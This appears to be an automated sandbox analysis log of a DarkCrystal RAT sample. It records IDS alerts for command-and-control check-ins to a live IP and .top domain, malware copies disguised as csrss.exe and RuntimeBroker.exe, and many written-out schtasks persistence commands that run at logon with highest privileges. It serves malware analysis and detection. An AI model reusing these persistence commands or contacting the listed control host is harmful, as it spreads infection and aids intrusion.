                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49719 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49720 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49712 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49722 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49721 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49704 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49716 -> 80.211.144.156:80
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49718 -> 80.211.144.156:80
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                              Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: 621287cm.n9shteam2.top
                              Source: unknownHTTP traffic detected: POST /UpdatelinuxWindowsUniversal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 621287cm.n9shteam2.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:02:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 29 Aug 2024 21:03:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13Connection: keep-aliveData Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://621287cm.n9shteam2.top
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://621287cm.n9shteam2.top/
                              Source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://621287cm.n9shteam2.top/UpdatelinuxWindowsUniversal.php
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp, GrVEPTmsoNTbY.exe, 0000000A.00000002.2186917152.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP
                              Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\CAgBdTQY.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2085769625.000000001B7E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 00000000.00000000.1995307367.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2080353775.000000001B7B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001C.00000002.2230154294.0000000002610000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001F.00000002.2263574639.00000000031AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001F.00000002.2263574639.00000000031A2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001F.00000002.2263574639.000000000325A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exe, 0000001F.00000002.2263574639.0000000003190000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 4ra1Fo2Zql.exe
                              Source: 4ra1Fo2Zql.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: 4ra1Fo2Zql.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: RuntimeBroker.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: GrVEPTmsoNTbY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: csrss.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: GrVEPTmsoNTbY.exe0.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 4ra1Fo2Zql.exe, YJ0nwytrtfFSElJEkGn.csCryptographic APIs: 'CreateDecryptor'
                              Source: 4ra1Fo2Zql.exe, 00000000.00000002.2058962549.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP
                              Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@54/48@1/1
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\Desktop\xxMkqOtN.log
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeMutant created: NULL
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-ln07BHafEPq82yTj5rEF
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile created: C:\Users\user\AppData\Local\Temp\q4lxag2s
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat"
                              Source: 4ra1Fo2Zql.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: 4ra1Fo2Zql.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Windows\System32\schtasks.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile read: C:\Users\desktop.ini
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: 4ra1Fo2Zql.exeReversingLabs: Detection: 65%
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeFile read: C:\Users\user\Desktop\4ra1Fo2Zql.exe
                              Source: unknownProcess created: C:\Users\user\Desktop\4ra1Fo2Zql.exe "C:\Users\user\Desktop\4ra1Fo2Zql.exe"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknownProcess created: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                              Source: unknownProcess created: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "4ra1Fo2Zql" /sc ONLOGON /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f
                              Source: unknown Process created: C:\Users\user\Desktop\4ra1Fo2Zql.exe C:\Users\user\Desktop\4ra1Fo2Zql.exe
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: unknown Process created: C:\Users\user\Desktop\4ra1Fo2Zql.exe C:\Users\user\Desktop\4ra1Fo2Zql.exe
                              Source: unknown Process created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: unknown Process created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: unknown Process created: C:\Users\user\RuntimeBroker.exe C:\Users\user\RuntimeBroker.exe
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: unknown Process created: C:\Users\user\RuntimeBroker.exe C:\Users\user\RuntimeBroker.exe
                              Source: unknown Process created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe "C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: unknown Process created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2144.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFABAA3A3EFF44E7388BEDB3353C25726.TMP"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES22AB.tmp" "c:\Windows\System32\CSC1FF918B0E6FF4E65A25AACD427A2AFF8.TMP"
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe "C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
